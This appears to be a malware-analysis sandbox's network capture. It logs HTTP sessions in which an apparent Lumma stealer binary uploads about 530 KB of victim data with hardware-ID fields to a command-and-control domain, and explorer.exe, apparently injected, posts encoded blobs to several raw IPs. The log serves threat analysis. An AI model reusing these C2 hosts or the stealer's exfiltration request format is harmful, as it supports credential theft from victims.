h0Hp36IJ/6W7ujiE52QrRRJloWSbnFMiuYqiR9ek5UE0gX6cfjWnbrECHyjgEWhk5czdbtx8HQG+JMmf1DJk+OgEXEnWnsBsrmECBmW43jGTzW9EKxJzjsi+uTqEwQUBCKBul609Q3ur/I2XxEGTT8hlp32C8Qfhbt2/irgbvTB7ziG46o0tpcK7+2JpDBAw5TwBSlOVqOMhSJJAt76GtF/MuTVx1iDwohzx4XDIY1AkDkDvr+Q++N+dNObfZG4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.10	49796	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:36 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:36 UTC	1122	OUT	Data Raw: 59 6d 64 32 71 31 51 47 64 36 64 4e 69 69 50 4b 5a 62 4d 62 63 79 4a 4b 33 53 37 71 70 70 71 53 33 51 79 6c 44 31 46 2b 78 4a 61 53 32 63 6e 72 35 75 64 46 32 45 5a 63 73 48 46 77 37 62 52 64 4e 59 78 39 6c 32 56 75 73 77 30 30 73 67 67 41 47 78 65 49 79 72 35 37 49 41 6b 52 73 64 6e 4e 65 67 45 37 62 45 55 73 44 39 6e 6e 52 73 7a 63 68 74 56 2b 4c 6b 34 54 37 34 31 67 53 77 6c 59 70 75 4d 79 58 72 55 49 35 56 4a 68 30 4c 44 48 73 68 62 37 62 4f 73 7a 68 49 49 6b 49 69 73 73 35 5a 49 41 44 7a 33 41 48 58 52 71 55 64 74 42 41 45 63 34 33 51 4a 48 58 77 50 78 43 59 47 49 2f 6d 47 7a 42 34 46 47 4b 41 69 69 44 64 6c 62 70 74 72 54 4b 37 56 58 31 41 41 64 6f 76 38 32 78 45 54 33 77 35 75 30 41 75 30 56 30 54 4f 6e 6d 34 6f 67 42 37 68 2f 50 54 67 4e 51 6a 30 Data Ascii: Ymd2q1QGd6dNiiPKZbMbcyJK3S7qppqS3QylD1F+xJaS2cnr5udF2EZcsHFw7bRdNYx9l2Vusw00sggAGxeIyr57IAkRsdnNegE7bEUsD9nnRszchtV+Lk4T741gSwlYpuMyXrUI5VJh0LDHshb7bOszhIIkIiss5ZIADz3AHXRqUdtBAEc43QJHXwPxCYGI/mGzB4FGKAiiDdlbptrTK7VX1AAdov82xET3w5u0Au0V0TOnm4ogB7h/PTgNQj0
2024-07-24 17:57:37 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:37 UTC	685	IN	Data Raw: 41 68 2f 61 6f 38 43 68 67 76 73 36 34 56 4b 2f 68 57 53 55 46 44 4e 66 34 45 32 74 67 53 49 4d 71 4c 33 67 7a 6c 32 4a 70 4c 31 6d 6b 65 6d 5a 63 42 48 45 64 59 39 6a 4a 67 6a 64 79 31 49 71 50 46 53 31 34 31 31 53 48 35 75 31 39 55 68 6a 68 54 4b 42 69 43 55 51 47 50 37 6f 71 76 79 32 37 6f 64 38 52 56 67 4f 6e 32 43 46 2b 43 41 6e 51 73 30 75 74 78 6b 6e 7a 4e 4a 4c 59 7a 63 51 39 76 58 61 54 6d 4b 48 75 4f 6b 33 41 38 51 51 5a 2b 7a 72 4b 68 42 71 38 36 65 48 49 71 37 66 44 4b 46 68 68 59 78 42 47 66 52 33 4a 65 37 4f 71 79 34 6b 31 6d 45 77 37 56 79 33 65 46 76 44 62 79 54 72 7a 6b 36 49 6c 2b 68 6f 67 57 38 6f 6d 6c 52 34 41 73 58 6c 65 51 41 32 33 45 55 61 46 62 48 49 46 47 68 53 32 59 4e 72 33 51 61 59 42 32 2b 51 48 57 4e 68 50 44 54 2f 43 50 79 Data Ascii: Ah/ao8Chgvs64VK/hWSUFDNf4E2tgSIMqL3gzl2JpL1mkemZcBHEdY9jJgjdy1IqPFS1411SH5u19UhjhTKBiCUQGP7oqvy27od8RVgOn2CF+CAnQs0utxknzNJLYzcQ9vXaTmKHuOk3A8QQZ+zrKhBq86eHIq7fDKFhhYxBGfR3Je7Oqy4k1mEw7Vy3eFvDbyTrzk6Il+hogW8omlR4AsXleQA23EUaFbHIFGhS2YNr3QaYB2+QHWNhPDT/CPy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.10	49797	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:36 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 531309 Host: liernessfornicsa.shop
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: 3b 61 8d 04 93 7e 17 2c e4 c7 ea bf 54 9b 38 b6 ad da 94 ca 0d 46 8e 75 9a 81 ec 38 32 0f 5e b3 4d 49 5d ca 74 54 de c6 4f e7 0e 2b d1 19 f6 e9 be 9d fd e8 66 2b 7b 60 ae bd af 56 b1 79 ca 92 7c e3 9c 36 61 9d 14 8b 3f da 30 6e 9b ec 6c de 1b 6a 98 82 8d 0a b4 d2 10 7a 59 27 e7 ff 5b f4 f6 8d d4 34 b1 20 8a cc a5 11 f7 ad 67 fb 70 39 f9 ca 7b 20 59 1d 8c 34 7c cd 51 a7 c0 bd 01 d0 da c1 20 77 b8 d4 0d 5a 8f 08 68 7d e1 00 48 43 c1 de 58 46 da 00 b5 02 0f ab 62 d8 7c a7 61 95 b9 bb 73 dd df 16 3f 2c 1c 9d 03 23 d1 4a d5 e2 d6 f0 5c f7 07 8f b6 aa 8f fd ba 9f 56 be 19 40 b4 59 99 bb fc da 98 00 7d 88 36 84 63 9f 25 80 c1 21 c5 ba 14 54 c3 6c 71 6c 97 c7 50 09 29 b9 a7 b6 a2 d9 6a 00 2c 3f 77 e5 bb 52 e6 e7 6c f1 c4 ba f8 b5 e2 95 eb e6 f1 c1 de 2e 1f fe b7 Data Ascii: ;a~,T8Fu82^MI]tTO+f+{`Vy\|6a?0nljzY'[4 gp9{ Y4\|Q wZh}HCXFb\|as?,#J\V@Y}6c%!TlqlP)j,?wRl.
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: dd 44 dd 88 d6 75 e9 fc 74 30 96 fb e8 96 83 bb f1 08 97 13 2a 55 2e ae cb 41 37 5c cb ed 62 a9 ac ff 6a 1d b5 c1 6a 69 c5 c3 a3 ce 56 da 3d 3e 9f 08 1e e5 d2 10 c4 2d 82 29 cd d4 4e 20 c6 c7 91 4f fb 5e db f7 92 af 36 59 c9 29 25 ac ec 65 42 68 59 70 b7 a8 93 23 47 5e 96 f7 f6 29 6a 14 a6 5e 34 db 03 db d1 17 8c c4 9c c1 c4 bd 75 98 07 7e 02 ce 3e 38 41 fb 58 71 b3 00 db 73 a7 09 7c 10 ee 71 d8 41 47 be 4a 8c 5b d4 0c ea 8d bb ac 5c 1e d7 5c 69 a3 17 4a 93 67 ba 34 91 21 b2 b5 a2 a9 3b 25 fb 47 88 fc 70 98 9a 74 41 9c 93 b2 3c 29 25 3c 00 9f b7 6d 5b 47 2e 67 16 ed 26 f6 24 ff cc 8a d3 97 9e 99 e7 39 5e 53 cf 4a db c0 70 aa 64 34 d4 b2 97 e8 33 a3 92 75 be 1c 79 76 db 4c fb 35 83 f2 3c 46 fa ed 51 d9 d4 3c 59 e5 fd 03 f1 1e 83 61 f9 0f 14 d2 46 3d 58 bc Data Ascii: Dut0*U.A7\bjjiV=>-)N O^6Y)%eBhYp#G^)j^4u~>8AXqs\|qAGJ[\\iJg4!;%GptA<)%<m[G.g&$9^SJpd43uyvL5<FQ<YaF=X
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: a2 0e e2 b9 0a a0 8b a5 51 65 5b 2f 7f ee 9a 4d a4 d5 87 e1 c4 61 27 c7 6e 0f 35 8b 3e 19 f2 be 71 7e e9 93 ff bb c9 33 f4 c1 c1 0b 3f 43 34 c9 ba 6a e8 29 ba 19 8e e2 fa 18 81 c8 1b bd 2f 60 f8 91 f8 40 5c 29 10 43 d8 77 22 78 b0 e5 6d 6b 65 da ed 9a 9b 3a 5f 80 95 2b 5e 33 1f fa c8 53 3b ab 7c 39 cd f0 8b 4c 2e fb ea 1d 02 2f e5 de fd d6 c4 b0 4c 36 7b ee e9 54 18 af 24 19 f8 cf e7 99 4f 51 17 78 0d ad bb bb 66 26 18 42 42 61 16 58 e2 61 5a 1e 2b 6d 4a 97 03 c4 d0 87 68 5c b4 a9 df 15 b4 10 47 fa fb 52 3d be d0 ba e9 cc 3b 6f e5 d4 ae ad 07 1d c4 89 7d 7a 97 7f 22 80 c5 0c 6e 09 66 ae 90 54 d4 b3 7c 87 fe d2 55 93 09 a0 15 4a 8a 8e 95 3e 0b c9 c7 5a 0c cb 58 87 9b 3a 00 bf ce 65 3a ea 66 cc 3d 38 40 90 fe 04 54 cf ea ac 8f 36 3a ad 5a c2 ba 67 e0 61 69 Data Ascii: Qe[/Ma'n5>q~3?C4j)/`@\)Cw"xmke:_+^3S;\|9L./L6{T$OQxf&BBaXaZ+mJh\GR=;o}z"nfT\|UJ>ZX:e:f=8@T6:Zgai
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: 3b 6e 0a 61 31 74 62 b0 c1 9f a0 0d cd 68 23 3f 23 43 59 fb f4 62 c8 65 b6 1b 71 27 3c ba de bb ef fb 90 04 22 99 db c8 29 55 61 9d de 44 6e 86 f6 8b 76 34 ce af 6e 06 c0 5e 25 77 fa 9f 27 c4 d3 78 77 30 61 5e 8c df 23 bc 95 aa 47 2f d6 9c 96 9e ed ba 4c 33 a4 0b df e9 2c 42 aa f5 69 6c 40 e0 c1 9e d1 1c 1d 4d 92 e9 46 e1 94 c8 65 55 99 dc 68 de f6 3f 86 4e fb 9a 21 b5 eb 44 d1 fb 22 7a 89 ed 0d f5 b6 9c 2b 60 1b bf 23 ba 71 eb 94 a8 32 ab 50 14 73 99 d8 58 f0 94 b8 29 b1 4f 84 7e 13 17 3c 07 8a 5a 83 11 8c 82 03 e5 5b 5b a5 3c df de 1e 1a 61 a5 a4 3c f2 ae 79 8f 64 67 06 17 97 86 45 51 1a 87 86 97 e5 b8 71 47 92 42 34 34 95 22 a8 d3 3c 5e f4 7b f3 83 91 f8 ea f1 79 9f 7d f8 2b ff 8f e2 69 8a a2 fe 3f 4b 66 00 1a 7e 7a ef 80 38 2f 30 72 56 95 06 f9 03 7f Data Ascii: ;na1tbh#?#CYbeq'<")UaDnv4n^%w'xw0a^#G/L3,Bil@MFeUh?N!D"z+`#q2PsX)O~<Z[[<a<ydgEQqGB44"<^{y}+i?Kf~z8/0rV
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: f7 3c a0 3c 02 36 c3 82 c8 7d b4 5a 0c b0 0a 6a 48 c9 a3 aa 66 b7 aa 1e 1b 0a 1a f8 a1 93 7d c7 bc 4a 87 00 b2 4c f3 5e 35 ba 1f e4 90 3f 20 9b 0c c8 47 79 41 f1 23 8c 6f 1f 47 ff b9 ce bc 7b 1e 1f 18 ba 4e c0 54 d7 f6 d0 42 21 2a 04 41 9e b4 bc e5 a7 13 c9 ae 18 0b 88 ee 57 0c 26 20 32 27 03 bf 75 5d 28 90 30 6b e9 9b 9a 2b a2 5b e3 e3 b4 1b b1 af 7a 7e 22 70 7c ea 60 23 02 90 cb a0 4e f6 ac bb e4 ba 07 fa 09 2d f5 54 fd b4 d6 9f 20 16 4a c1 06 70 60 d9 99 ab 83 7a e4 12 4c 29 4f 37 22 7a 09 49 f0 5d 45 24 7e 58 10 62 5a 82 c6 ac 7b 07 cb 5e dd a9 ff 63 a2 61 9e 96 72 09 38 a7 7e 74 69 7d 06 13 f6 ee 96 4b b7 84 41 48 27 6f 9e e7 84 05 33 64 dc 0e df d2 ee 50 12 75 9a ce 07 79 71 ac e5 1b 7c 91 21 4b 4b 52 fb 6b 55 30 58 21 cc af a9 86 48 fb ca f3 59 16 Data Ascii: <<6}ZjHf}JL^5? GyA#oG{NTB!*AW& 2'u](0k+[z~"p\|`#N-T Jp`zL)O7"zI]E$~XbZ{^car8~ti}KAH'o3dPuyq\|!KKRkU0X!HY
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: 2f ca 29 c8 90 5e 81 ec 3c 22 ea 3e 88 0e 13 4f 6b dd 51 de 7b ed b3 fa 9e e4 61 2b 17 a6 8b e8 3c 95 fd b7 62 a2 78 d8 4d e5 82 40 81 d3 bf d0 48 0b fa 46 82 e1 5c e3 00 a5 44 f4 e4 29 db 74 53 b3 93 31 ee 33 b9 01 44 41 48 d0 16 e8 03 93 d8 02 c1 e0 bb 6a d4 0c a9 70 3f ec e5 ae 01 0a 8e a8 1c 76 19 a5 b9 0a 10 c2 43 71 2e f6 6a f7 3d c4 4e fc 07 ef 7f 57 2f 7d 49 e7 f8 d8 2f 38 52 ac bf 13 76 d3 91 b2 93 f7 3c 8a 79 83 de 6d 72 b3 fd 8b c7 db 88 1f 0f 45 0d 6f b7 da 8e a7 69 c3 d7 47 b1 d6 b8 c4 04 2f 33 22 81 4a 2c e3 e3 85 9b 09 73 2d d7 92 d9 c8 19 0c 28 16 b0 cb ac 15 c8 22 21 96 7c 9a d2 22 6a ac 79 79 53 20 da f1 c3 2b 09 d0 79 58 ba fe ce d1 c3 dd 57 b8 7f 68 94 b5 b5 6b 5d 8d 94 1d d6 c2 0e 5b 9f 54 50 c2 53 a8 d8 9f da 69 57 e0 cf 5e 35 d2 df Data Ascii: /)^<">OkQ{a+<bxM@HF\D)tS13DAHjp?vCq.j=NW/}I/8Rv<ymrEoiG/3"J,s-("!\|"jyyS +yXWhk][TPSiW^5
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: d7 5c b9 c3 4b 18 ba 01 48 93 32 ea 02 30 ee a1 12 e0 c7 bc 60 d4 1c 56 a9 07 7a 16 6d fd 09 e1 a6 9d 77 4f 15 92 ef 05 bc 93 77 fe 56 81 3c ae 83 9b 68 25 d2 04 64 e3 88 05 27 be 6b 88 3e 6c fc e3 89 06 81 3c 42 c7 15 9c d9 e8 33 a5 aa 89 81 1b 0c 2a 8a 59 7c 48 ff 36 06 04 a3 21 10 82 dd d6 1f f9 ae 05 6f c7 20 87 b1 80 94 a5 94 78 1e 14 48 08 f0 03 c2 3a 91 17 c4 a7 32 57 8a 60 d4 0f d9 02 70 9a f5 9e 0e 8c 28 24 e4 db 46 d5 86 7b b8 81 3b 82 e9 5c 12 0f eb 59 74 83 e1 a3 dc f5 f7 72 11 38 f7 32 5b 14 fb f0 c2 85 17 a4 d7 f1 15 39 02 e0 20 63 ec 49 e0 f4 64 d5 1f 12 05 2a 3b df e1 38 14 e4 07 fb b1 19 53 3c 98 a1 13 ed df 18 c6 bb 3b 8b dc bf a1 0c 90 b8 64 c3 3d 1a 1d 8e 5c 40 14 28 e3 72 5f c1 2c 19 ce 7f 0d 5b a0 15 c7 9e 0e 86 bf 5b 88 f4 e5 e1 65 Data Ascii: \KH20`VzmwOwV<h%d'k>l<B3Y\|H6!o xH:2W`p($F{;\Ytr82[9 cId;8S<;d=\@(r_,[[e
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: bc 48 24 73 e3 83 35 1e 53 9e d2 01 e9 1b 93 66 d6 3f d0 c8 ee fe 2a 4c 3a 41 cb f9 1f bb 27 cc 2f 38 02 93 23 30 8e ad 4c af f4 6c f0 16 59 16 17 09 eb da 5f fc f8 01 06 0e 54 c1 2f 23 27 de cc 94 cd 7e 64 6c 23 82 b4 eb 27 18 e9 bd 51 47 92 e4 d9 b9 2d 5b 4d 8a 9e 45 58 69 66 79 f8 ae cc ec 6b 74 3f 8a 46 4d ec f7 18 3d 64 d4 1a ff c6 b1 08 b7 f7 6e ea 54 5d cb 5f f5 c5 57 dd 8a db 22 f8 79 9e 7e ac 32 0c 43 f6 f1 07 cd 3d 93 33 98 8d 5a 8f 3f c1 0c 6f f2 4c ed 40 60 41 c8 70 45 ee 88 eb 5a fe c8 ad a1 2e 5e 49 6c c8 d2 37 8b 32 73 af 74 9f 88 29 53 93 df 5d b6 ad 57 3b b7 b7 5d 6b d8 de 16 d7 3e bd 98 23 c3 f2 59 f5 46 8c 7e 08 f4 28 3e 99 42 a0 2e c4 6f bc f3 0b 50 0f 4f 9c 20 29 7c 5b 92 80 98 b3 81 69 96 24 42 7e fa b2 8d ad d3 87 da 9c c8 f1 9c ff Data Ascii: H$s5Sf?*L:A'/8#0LlY_T/#'~dl#'QG-[MEXifykt?FM=dnT]_W"y~2C=3Z?oL@`ApEZ.^Il72st)S]W;]k>#YF~(>B.oPO )\|[i$B~
2024-07-24 17:57:36 UTC	15331	OUT	Data Raw: 7d ef 57 88 75 00 59 ff 40 24 5a 68 46 83 91 cc 06 09 61 52 24 02 b8 e8 c8 78 c9 e3 91 35 97 fb 76 be 6b 0f 22 81 fd e3 5f 65 5c 5d e6 af fd bd 1a 30 f3 91 b1 6d 36 9e b9 db 48 f1 5e 3a 5d d3 cc 3c ca 9e 39 6c 6a 84 91 23 b4 0b 16 2e 65 0b bc 57 4f 4c 88 1b 34 db c4 af e3 f4 9c a3 64 a9 ee 16 66 e0 51 0f f7 ef 28 ef 38 53 58 71 e3 4c 4d e8 1d e1 e2 30 6c 10 ea 67 8e 43 8e bc ba fc f1 a0 e1 c0 1f 4f d6 17 bf fa a8 fa e1 9f 35 9b 91 56 ad 12 36 87 9a c6 da 36 bc 23 f4 31 34 37 5d bb 60 b9 e1 c0 bd b3 22 11 2b 9f 64 37 4f 3f db 79 5a e8 8f e5 4a a0 2a 4b 76 cf b9 80 1a 4a 91 ec 40 ba 3d de 19 bd 62 c9 b6 b1 0d be c5 09 f9 71 23 49 52 5f 5c 50 d1 02 8e e2 b1 71 29 51 8c 27 d2 22 cb e2 6b 93 ea 19 c7 77 47 a9 c8 3d fe d6 f6 32 64 12 b9 fe de ef ba 06 34 56 98 Data Ascii: }WuY@$ZhFaR$x5vk"_e\]0m6H^:]<9lj#.eWOL4dfQ(8SXqLM0lgCO5V66#147]`"+d7O?yZJ*KvJ@=bq#IR_\Pq)Q'"kwG=2d4V
2024-07-24 17:57:39 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f9ufgqnova3qklijk8i66ab21p; expires=Sun, 17-Nov-2024 11:44:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3k162Tj63Logggyb9yI73wb6lCowJCT4ptc8IlHCz8gSl1vuNRjverMhoGLd44DA9VYj9Bh7H2%2BgUUdJMihzLrhJQRHX84MODWS0fhXgi17CqSH%2F5ie5vM6KHP%2Bi5cdgMmDOw%2FuFlKQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cb2a1f634414-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.10	49798	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:38 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:38 UTC	1122	OUT	Data Raw: 50 44 51 72 6a 79 69 6b 4d 47 49 62 45 2b 71 55 38 62 44 66 65 78 37 58 70 4d 38 6b 63 59 63 43 6f 45 34 43 6d 44 75 54 6e 48 54 67 50 7a 33 63 57 79 31 66 69 79 6e 47 57 50 51 49 41 6a 4f 31 4d 4f 6d 4b 35 32 63 4c 30 67 53 61 72 47 4a 65 52 79 6a 71 68 63 76 55 59 36 47 68 74 36 2b 53 4f 56 49 32 55 71 43 79 73 2b 50 33 55 63 73 32 48 65 53 76 5a 4d 56 34 44 50 6e 34 74 6f 30 76 41 2b 73 53 4f 69 68 70 67 69 50 6d 68 67 2f 57 36 31 6e 4e 57 36 78 31 30 6c 72 2b 4f 50 2b 51 6b 38 55 34 72 72 34 6e 47 71 70 74 4b 78 77 75 38 42 41 4a 6a 70 32 43 6f 4f 6e 4c 2b 6e 49 41 79 51 38 63 47 36 69 4f 4b 4e 53 71 2f 2f 43 41 50 58 72 36 75 6d 69 6a 47 6b 31 45 51 6a 75 49 74 6c 79 6d 34 50 49 59 79 2f 34 54 6e 64 31 6c 72 2b 4d 2f 36 54 6e 37 61 67 79 34 38 70 77 Data Ascii: PDQrjyikMGIbE+qU8bDfex7XpM8kcYcCoE4CmDuTnHTgPz3cWy1fiynGWPQIAjO1MOmK52cL0gSarGJeRyjqhcvUY6Ght6+SOVI2UqCys+P3Ucs2HeSvZMV4DPn4to0vA+sSOihpgiPmhg/W61nNW6x10lr+OP+Qk8U4rr4nGqptKxwu8BAJjp2CoOnL+nIAyQ8cG6iOKNSq//CAPXr6umijGk1EQjuItlym4PIYy/4Tnd1lr+M/6Tn7agy48pw
2024-07-24 17:57:39 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:39 UTC	685	IN	Data Raw: 47 41 58 56 49 74 79 5a 47 42 74 47 59 6f 78 58 78 53 6e 50 75 7a 64 47 4e 46 61 48 31 4f 62 71 2b 32 74 5a 72 38 59 4f 31 58 33 78 72 74 62 6a 4d 58 6a 45 63 43 72 33 4a 6e 42 71 61 32 6d 61 55 6e 43 79 43 38 78 34 4c 63 71 61 33 6a 66 41 39 63 65 42 6f 47 51 38 77 57 4a 6d 59 44 32 32 53 6b 41 39 55 4d 75 4b 2b 74 4b 4e 68 43 57 30 42 4b 36 6b 39 30 64 67 65 62 41 62 42 7a 6e 57 56 32 7a 36 45 66 66 48 79 75 32 30 4c 36 79 69 65 30 4a 58 36 4b 44 68 6b 7a 30 32 59 51 72 7a 41 2f 34 41 5a 72 6d 31 6b 6b 78 41 2b 35 36 4b 72 2f 55 68 4d 66 74 36 35 6a 46 46 7a 63 41 71 59 6f 76 5a 69 36 6c 61 36 57 76 76 4d 4f 33 6d 7a 61 56 6f 41 44 79 4b 71 39 45 4d 46 48 52 4b 59 66 4d 37 54 54 59 6d 61 62 7a 57 4f 34 6c 66 78 7a 72 47 54 4f 39 4f 69 73 52 61 77 36 61 Data Ascii: GAXVItyZGBtGYoxXxSnPuzdGNFaH1Obq+2tZr8YO1X3xrtbjMXjEcCr3JnBqa2maUnCyC8x4Lcqa3jfA9ceBoGQ8wWJmYD22SkA9UMuK+tKNhCW0BK6k90dgebAbBznWV2z6EffHyu20L6yie0JX6KDhkz02YQrzA/4AZrm1kkxA+56Kr/UhMft65jFFzcAqYovZi6la6WvvMO3mzaVoADyKq9EMFHRKYfM7TTYmabzWO4lfxzrGTO9OisRaw6a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.10	49800	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:40 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: liernessfornicsa.shop
2024-07-24 17:57:40 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 Data Ascii: act=get_message&ver=4.0&lid=qToYrJ--&j=&hwid=8F2C114769E59A360D3FAAA1B508DF78
2024-07-24 17:57:40 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m4bdqv7oi7ltp5goq6jngfthnd; expires=Sun, 17-Nov-2024 11:44:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mtye6lA7dROdoMRxPX15Mv%2F7Rd5O%2B%2FFXwSX5uys6bGVEUdtH9LqqXHwSDXy3ksCPiiw8WngnYT1BlLgb00bBH32aek7wkBkX7Pwrb6bMNDLn%2FmegG66zj80oyKbttZaRxMOIsICPUz0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cb3e3ff919ae-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:40 UTC	54	IN	Data Raw: 33 30 0d 0a 68 42 45 44 68 46 35 71 4d 65 66 77 49 51 56 44 65 6b 6d 6c 4e 63 34 57 41 57 62 72 30 64 74 67 54 58 56 35 5a 61 72 39 59 77 37 66 54 41 3d 3d 0d 0a Data Ascii: 30hBEDhF5qMefwIQVDekmlNc4WAWbr0dtgTXV5Zar9Yw7fTA==
2024-07-24 17:57:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.10	49801	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:40 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:40 UTC	1122	OUT	Data Raw: 6a 78 53 4b 6d 55 78 48 71 6a 35 77 42 64 51 73 44 35 45 57 52 42 53 4e 4b 69 6d 5a 70 52 35 73 53 70 42 62 2b 35 55 6a 51 64 53 76 65 49 42 78 72 69 4a 30 55 65 56 7a 56 67 54 57 61 36 61 65 6b 4a 6c 4e 7a 57 5a 5a 31 45 64 73 55 42 33 72 2f 76 31 50 2b 74 63 48 4d 64 78 72 42 77 45 64 6d 56 62 54 5a 4e 48 63 5a 75 6b 64 74 70 79 42 50 38 49 67 77 6e 76 46 49 41 73 4b 56 46 53 50 38 47 7a 38 51 34 2f 43 52 44 56 75 72 66 61 61 6e 6d 73 6d 4f 77 30 66 37 33 48 4a 62 50 73 66 6b 66 55 70 74 76 6e 2f 46 47 62 30 42 69 48 67 31 61 30 73 4f 51 65 4f 56 77 6e 6a 4f 70 71 4d 69 72 62 47 72 49 76 36 4e 54 65 37 68 51 4a 41 77 73 31 75 76 47 4f 6e 77 58 75 58 68 46 58 51 61 5a 50 4d 64 6c 46 4a 58 58 76 43 6f 5a 79 53 59 67 36 76 65 30 68 78 62 45 61 56 47 2b 54 Data Ascii: 